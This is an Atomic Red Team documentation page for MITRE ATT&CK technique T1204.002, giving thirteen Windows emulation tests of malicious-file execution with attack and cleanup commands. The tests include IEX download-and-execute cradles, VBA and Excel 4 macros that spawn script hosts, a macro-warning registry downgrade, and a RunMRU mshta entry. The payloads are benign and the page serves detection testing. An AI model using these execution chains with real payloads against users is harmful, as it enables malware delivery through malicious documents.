security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c7310aa4276f8d1ac64bd3f23eefbfdd6e2e42ff
atomic-red-team/atomics/T1204.002/T1204.002.md
T
Atomic Red Team doc generator 9f6a1eab36 Generated docs from job=generate-docs branch=master [ci skip]
2026-02-18 16:55:45 +00:00

631 lines
25 KiB
Markdown
Raw Blame History

# T1204.002 - User Execution: Malicious File
## Description from ATT&CK
> An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg, and .iso.(Citation: Mandiant Trojanized Windows 10)
>
> Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)
>
> While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
[Source](https://attack.mitre.org/techniques/T1204/002)
## Atomic Tests
- [Atomic Test #1: OSTap Style Macro Execution](#atomic-test-1-ostap-style-macro-execution)
- [Atomic Test #2: OSTap Payload Download](#atomic-test-2-ostap-payload-download)
- [Atomic Test #3: Maldoc choice flags command execution](#atomic-test-3-maldoc-choice-flags-command-execution)
- [Atomic Test #4: OSTAP JS version](#atomic-test-4-ostap-js-version)
- [Atomic Test #5: Office launching .bat file from AppData](#atomic-test-5-office-launching-bat-file-from-appdata)
- [Atomic Test #6: Excel 4 Macro](#atomic-test-6-excel-4-macro)
- [Atomic Test #7: Headless Chrome code execution via VBA](#atomic-test-7-headless-chrome-code-execution-via-vba)
- [Atomic Test #8: Potentially Unwanted Applications (PUA)](#atomic-test-8-potentially-unwanted-applications-pua)
- [Atomic Test #9: Office Generic Payload Download](#atomic-test-9-office-generic-payload-download)
- [Atomic Test #10: LNK Payload Download](#atomic-test-10-lnk-payload-download)
- [Atomic Test #11: Mirror Blast Emulation](#atomic-test-11-mirror-blast-emulation)
- [Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell](#atomic-test-12-clickfix-campaign---abuse-runmru-to-launch-mshta-via-powershell)
- [Atomic Test #13: Simulate Click-Fix via Downloaded BAT File](#atomic-test-13-simulate-click-fix-via-downloaded-bat-file)
### Atomic Test #1: OSTap Style Macro Execution
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
**Supported Platforms:** Windows
**auto_generated_guid:** `8bebc690-18c7-4549-bc98-210f7019efff`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | string | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | string | Word|
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands
```powershell
Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed
###### Check Prereq Commands
```powershell
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
### Atomic Test #2: OSTap Payload Download
Uses cscript //E:jscript to download a file
**Supported Platforms:** Windows
**auto_generated_guid:** `3f3af983-118a-4fa1-85d3-ba4daa739d80`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_file | File to execute jscript code from | path | %TEMP%\OSTapGet.js|
| file_url | URL to retrieve file from | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile('ostapout.txt', 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands
```cmd
del #{script_file} /F /Q >nul 2>&1
```
### Atomic Test #3: Maldoc choice flags command execution
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
**Supported Platforms:** Windows
**auto_generated_guid:** `0330a5d2-a45a-4272-a9ee-e364411c4b18`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word or Excel | string | Word|
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed
###### Check Prereq Commands
```powershell
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
### Atomic Test #4: OSTAP JS version
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
**Supported Platforms:** Windows
**auto_generated_guid:** `add560ef-20d6-4011-a937-2c340f930911`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| jse_path | jse file to execute with wscript | path | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | string | Word|
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed
###### Check Prereq Commands
```powershell
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
### Atomic Test #5: Office launching .bat file from AppData
Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
**Supported Platforms:** Windows
**auto_generated_guid:** `9215ea92-1ded-41b7-9cd6-79f9a78397aa`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bat_path | Path to malicious .bat file | string | $("$env:temp\art1204.bat")|
| ms_product | Maldoc application Word or Excel | string | Word|
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
```
#### Cleanup Commands
```powershell
Remove-Item #{bat_path} -ErrorAction Ignore
Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed
###### Check Prereq Commands
```powershell
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
### Atomic Test #6: Excel 4 Macro
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
with Excel matches that of the local system. This username can be found under Files -> Options -> Username
**Supported Platforms:** Windows
**auto_generated_guid:** `4ea1fc97-8a46-4b4e-ba48-af43d2a98052`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| download_url | Download URL | string | https://live.sysinternals.com/procexp.exe|
| uname | Username for pathing | string | $env:Username|
#### Attack Commands: Run with `powershell`!
```powershell
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
Remove-Item $fname
Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("#{uname}" -ne "") {
$sheet.Cells.Item(1,1) = "#{uname}"
} else {
$sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlApp
```
#### Cleanup Commands
```powershell
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft Excel must be installed
###### Check Prereq Commands
```powershell
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
```
### Atomic Test #7: Headless Chrome code execution via VBA
This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local
webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver
and pull down the script and execute it. By default the payload will execute calc.exe on the system.
**Supported Platforms:** Windows
**auto_generated_guid:** `a19ee671-ed98-4e9d-b19c-d1954a51585a`
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
```
#### Cleanup Commands
```powershell
Stop-Process -name mshta
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft Word must be installed
###### Check Prereq Commands
```powershell
try {
$wdApp = New-Object -COMObject "Word.Application"
Stop-Process -Name "winword"
exit 0 } catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
```
##### Description: Google Chrome must be installed
###### Check Prereq Commands
```powershell
try {
$chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Google Chrome manually to meet this requirement"
```
### Atomic Test #8: Potentially Unwanted Applications (PUA)
The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
**Supported Platforms:** Windows
**auto_generated_guid:** `02f35d62-9fdc-4a97-b899-a5d9a876d295`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe|
| pua_file | path to PotentiallyUnwanted.exe | path | $env:TEMP/PotentiallyUnwanted.exe|
#### Attack Commands: Run with `powershell`!
```powershell
Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
& "#{pua_file}"
```
#### Cleanup Commands
```powershell
Stop-Process -name PotentiallyUnwanted
Remove-Item #{pua_file} -ErrorAction Ignore
```
### Atomic Test #9: Office Generic Payload Download
This Test uses a VBA macro to launch Powershell which will download a file from a user defined web server.
Required input agruments are c2_domain and file_name
Execution is handled by [Invoke-MalDoc](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
Example for c2 server located at 127.0.0.1 for the file test.txt which is nested below the parent directory in the tests/my-test folder
Example input args for file in root directory c2-domain = 127.0.0.1, file-name = test.txt
**Supported Platforms:** Windows
**auto_generated_guid:** `5202ee05-c420-4148-bf5e-fd7f7d24850c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| macro_path | Location of file which will be converted to a VBA macro | path | PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt|
| c2_domain | This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. | url | |
| c2_parent_directory | Parent directory where you have the "malicious" file on c2_domain server.
Will default to root directory. Forward slashes are not needed at begining or ending of directory path | path | |
| file_name | "Malicious" file to be downloaded.
This required file needs to be place on the user provided c2 domain
Example file can be found at PathToAtomicsFolder/T1204.002/src/test9-example-payload.txt | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt|
| ms_product | Maldoc application Word or Excel | string | Word|
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macroCode = Get-Content "#{macro_path}" -Raw
$URL = "#{c2_domain}" + "/" + "#{c2_parent_directory}"
$macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', "#{file_name}"
Invoke-MalDoc -macroCode $macroCode -officeProduct "#{ms_product}"
```
#### Cleanup Commands
```powershell
Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Destination c2_domain name or IP address must be set to a running HTTP server.
###### Check Prereq Commands
```powershell
if (#{c2_domain}) (exit 0) else (exit 1)
```
###### Get Prereq Commands
```powershell
Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service"
```
##### Description: Microsoftt #{ms_product} must be installed
###### Check Prereq Commands
```powershell
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
### Atomic Test #10: LNK Payload Download
This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
**Supported Platforms:** Windows
**auto_generated_guid:** `581d7521-9c4b-420e-9695-2aec5241167f`
#### Attack Commands: Run with `powershell`!
```powershell
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F
```
#### Cleanup Commands
```powershell
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
```
### Atomic Test #11: Mirror Blast Emulation
Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed.
Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies)
**Supported Platforms:** Windows
**auto_generated_guid:** `24fd9719-7419-42dd-bce6-ab3463110b3c`
#### Attack Commands: Run with `powershell`!
```powershell
Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
& '.\Excel 2016.lnk' "PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm"
```
#### Cleanup Commands
```powershell
reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f
```
### Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
**Supported Platforms:** Windows
**auto_generated_guid:** `3f3120f0-7e50-4be2-88ae-54c61230cb9f`
#### Attack Commands: Run with `powershell`!
```powershell
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -ErrorAction SilentlyContinue
```
### Atomic Test #13: Simulate Click-Fix via Downloaded BAT File
Simulates user execution of a BAT file downloaded from the Atomic Red Team GitHub repository.This test represents T1204.002 - User Execution via Malicious File.The BAT file performs harmless terminal output to simulate a "fix" operation.
**Supported Platforms:** Windows
**auto_generated_guid:** `22386853-f68d-4b50-a362-de235127c443`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | URL to download the BAT file from | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/click-fix.bat|
| outfile | Path where the BAT file will be saved | path | $env:TEMP\click-fix.bat|
#### Attack Commands: Run with `powershell`!
```powershell
$url = "#{url}"
$outfile = "#{outfile}"
Invoke-WebRequest -Uri $url -OutFile $outfile -UseBasicParsing
$process = Start-Process -FilePath $outfile -PassThru -WindowStyle Normal
$process.Id | Out-File "$env:TEMP\click-fix-pid.txt"
```
#### Cleanup Commands
```powershell
if (Test-Path "$env:TEMP\click-fix-pid.txt") {
$pid = Get-Content "$env:TEMP\click-fix-pid.txt"
Stop-Process -Id $pid -Force -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\click-fix-pid.txt" -ErrorAction SilentlyContinue
}
Remove-Item "#{outfile}" -ErrorAction SilentlyContinue
```
Reference in New Issue View Git Blame Copy Permalink